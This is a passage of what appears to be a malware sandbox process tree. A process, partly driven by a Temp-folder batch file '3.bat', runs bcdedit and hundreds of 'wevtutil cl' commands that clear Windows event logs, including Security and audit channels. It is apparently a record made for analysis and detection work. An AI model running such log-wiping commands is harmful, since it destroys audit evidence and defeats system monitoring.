        WEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
        5⤵
        
        PID:4936
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Operational"
        5⤵
        
        PID:3292
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
        5⤵
        
        PID:816
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ResetEng-Trace/Diagnostic"
        5⤵
        
        PID:5028
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
        5⤵
        
        PID:4444
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"
        5⤵
        
        PID:1788
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RetailDemo/Admin"
        5⤵
        
        PID:4868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-RetailDemo/Operational"
        5⤵
        
        PID:4420
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Graphics/Analytic"
        5⤵
        
        PID:1768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
        5⤵
        
        PID:3132
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Networking/Tracing"
        5⤵
        
        PID:4532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Web-Http/Tracing"
        5⤵
        
        PID:5108
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-WebAPI/Tracing"
        5⤵
        
        PID:3804
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
        5⤵
        
        PID:4464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
        5⤵
        
        PID:4688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
        5⤵
        
        PID:5076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
        5⤵
        
        PID:5036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime/CreateInstance"
        5⤵
        
        PID:3952
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Runtime/Error"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBClient/Analytic"
        5⤵
        
        PID:1328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
        5⤵
        
        PID:4628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
        5⤵
        
        PID:4776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBClient/Operational"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBDirect/Admin"
        5⤵
        
        PID:3172
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBDirect/Debug"
        5⤵
        
        PID:3528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBDirect/Netmon"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Analytic"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Audit"
        5⤵
        
        PID:2744
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Connectivity"
        5⤵
        
        PID:2932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Diagnostic"
        5⤵
        
        PID:3356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Operational"
        5⤵
        
        PID:4064
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Performance"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBServer/Security"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Admin"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Informational"
        5⤵
        
        PID:1536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SPB-ClassExtension/Analytic"
        5⤵
        
        PID:3128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SPB-HIDI2C/Analytic"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Schannel-Events/Perf"
        5⤵
        
        PID:4900
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sdbus/Analytic"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sdbus/Debug"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sdstor/Analytic"
        5⤵
        
        PID:4164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"
        5⤵
        
        PID:2808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
        5⤵
        
        PID:4592
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SearchUI/Diagnostic"
        5⤵
        
        PID:1732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SearchUI/Operational"
        5⤵
        
        PID:1812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SecureAssessment/Operational"
        5⤵
        
        PID:3772
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Adminless/Operational"
        5⤵
        
        PID:3736
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
        5⤵
        
        PID:912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
        5⤵
        
        PID:2636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
        5⤵
        
        PID:3836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
        5⤵
        
        PID:4396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
        5⤵
        
        PID:3576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"
        5⤵
        
        PID:1572
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-IdentityStore/Performance"
        5⤵
        
        PID:4412
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
        5⤵
        
        PID:2368
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Mitigations/KernelMode"
        5⤵
        
        PID:1580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Mitigations/UserMode"
        5⤵
        
        PID:1568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Netlogon/Operational"
        5⤵
        
        PID:3604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
        5⤵
        
        PID:540
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
        5⤵
        
        PID:3520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
        5⤵
        
        PID:3100
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-SPP-UX/Analytic"
        5⤵
        
        PID:632
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"
        5⤵
        
        PID:1456
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-UserConsentVerifier/Audit"
        5⤵
        
        PID:4456
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Security-Vault/Performance"
        5⤵
        
        PID:1796
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Admin"
        5⤵
        
        PID:5116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Operational"
        5⤵
        
        PID:1912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Perf"
        5⤵
        
        PID:2392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SendTo/Diagnostic"
        5⤵
        
        PID:4936
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
        5⤵
        
        PID:3292
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sensors/Debug"
        5⤵
        
        PID:5028
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Sensors/Performance"
        5⤵
        
        PID:4200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
        5⤵
        
        PID:1776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension/Analytic"
        5⤵
        
        PID:4924
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
        5⤵
        
        PID:1788
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
        5⤵
        
        PID:1896
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Servicing/Debug"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Debug"
        5⤵
        
        PID:820
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Operational"
        5⤵
        
        PID:280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Analytic"
        5⤵
        
        PID:3288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Debug"
        5⤵
        
        PID:3092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Operational"
        5⤵
        
        PID:3860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync/Analytic"
        5⤵
        
        PID:3840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync/Debug"
        5⤵
        
        PID:2196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync/Operational"
        5⤵
        
        PID:4964
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SettingSync/VerboseDebug"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
        5⤵
        
        PID:3952
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
        5⤵
        
        PID:1016
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupPlatform/Analytic"
        5⤵
        
        PID:880
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
        5⤵
        
        PID:2732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
        5⤵
        
        PID:4776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
        5⤵
        
        PID:2192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
        5⤵
        
        PID:4384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
        5⤵
        
        PID:1128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
        5⤵
        
        PID:2032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
        5⤵
        
        PID:756
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
        5⤵
        
        PID:4272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
        5⤵
        
        PID:1352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
        5⤵
        
        PID:1156
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
        5⤵
        
        PID:5024
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
        5⤵
        
        PID:3764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Core/ActionCenter"
        5⤵
        
        PID:2168
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Core/AppDefaults"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Core/LogonTasksChannel"
        5⤵
        
        PID:2748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Core/Operational"
        5⤵
        
        PID:1944
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
        5⤵
        
        PID:2560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-OpenWith/Diagnostic"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
        5⤵
        
        PID:4920
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
        5⤵
        
        PID:3704
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
        5⤵
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SleepStudy/Diagnostic"
        5⤵
        
        PID:1732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmartCard-Audit/Authentication"
        5⤵
        
        PID:1812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
        5⤵
        
        PID:4208
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
        5⤵
        
        PID:1632
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
        5⤵
        
        PID:1808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmartScreen/Debug"
        5⤵
        
        PID:1584
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmbClient/Audit"
        5⤵
        
        PID:1516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmbClient/Connectivity"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmbClient/Diagnostic"
        5⤵
        
        PID:4356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SmbClient/Security"
        5⤵
        
        PID:3668
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
        5⤵
        
        PID:4620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
        5⤵
        
        PID:2368
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
        5⤵
        
        PID:1052
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Spellchecking-Host/Analytic"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SruMon/Diagnostic"
        5⤵
        
        PID:2080
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-SrumTelemetry"
        5⤵
        
        PID:3188
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StateRepository/Diagnostic"
        5⤵
        
        PID:1200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StateRepository/Debug"
        5⤵
        
        PID:4536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StateRepository/Operational"
        5⤵
        
        PID:2860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StateRepository/Restricted"
        5⤵
        
        PID:4244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
        5⤵
        
        PID:268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3.bat"
      4⤵
      PID:4596
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=20
        5⤵
        
        PID:4384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit
        5⤵
        
        PID:1752
      - C:\Windows\system32\bcdedit.exe
        
        bcdedit
        6⤵
        
        PID:4524
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wevtutil.exe el
        5⤵
        
        PID:2960
      - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        6⤵
        
        PID:3108
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "AMSI/Debug"
        5⤵
        
        PID:3040
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Application"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Analytic"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "AirSpaceChannel"
        5⤵
        
        PID:1912
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowFilterGraph"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "DirectShowPluginControl"
        5⤵
        
        PID:4472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Els_Hyphenation/Analytic"
        5⤵
        
        PID:2928
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "EndpointMapper"
        5⤵
        
        PID:276
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "FirstUXPerf-Analytic"
        5⤵
        
        PID:668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "ForwardedEvents"
        5⤵
        
        PID:3200
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "General Logging"
        5⤵
        
        PID:4400
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "HardwareEvents"
        5⤵
        
        PID:5000
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "IHM_DebugChannel"
        5⤵
        
        PID:968
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
        5⤵
        
        PID:1500
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
        5⤵
        
        PID:4636
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
        5⤵
        
        PID:1924
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
        5⤵
        
        PID:3308
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Internet Explorer"
        5⤵
        
        PID:1052
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Key Management Service"
        5⤵
        
        PID:364
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
        5⤵
        
        PID:4484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
        5⤵
        
        PID:2076
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationFrameServer"
        5⤵
        
        PID:4404
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MedaFoundationVideoProc"
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MedaFoundationVideoProcD3D"
        5⤵
        
        PID:4736
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationAsyncWrapper"
        5⤵
        
        PID:1768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationContentProtection"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDS"
        5⤵
        
        PID:3604
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDeviceProxy"
        5⤵
        
        PID:4980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationMP4"
        5⤵
        
        PID:4652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationMediaEngine"
        5⤵
        
        PID:4348
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformance"
        5⤵
        
        PID:1232
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformanceCore"
        5⤵
        
        PID:1028
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPipeline"
        5⤵
        
        PID:4044
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPlatform"
        5⤵
        
        PID:3564
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationSrcPrefetch"
        5⤵
        
        PID:1664
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
        5⤵
        
        PID:4520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Admin"
        5⤵
        
        PID:3752
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Debug"
        5⤵
        
        PID:3852
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Operational"
        5⤵
        
        PID:296
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
        5⤵
        
        PID:2200
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
        5⤵
        
        PID:4784
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
        5⤵
        
        PID:3196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
        5⤵
        
        PID:5024
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IE/Diagnostic"
        5⤵
        
        PID:2168
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
        5⤵
        
        PID:2480
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
        5⤵
        
        PID:4056
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        5⤵
        
        PID:1296
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
        5⤵
        
        PID:824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
        5⤵
        
        PID:2636
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
        5⤵
        
        PID:1908
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
        5⤵
        
        PID:4412
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
        5⤵
        
        PID:2788
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
        5⤵
        
        PID:408
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
        5⤵
        
        PID:364
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
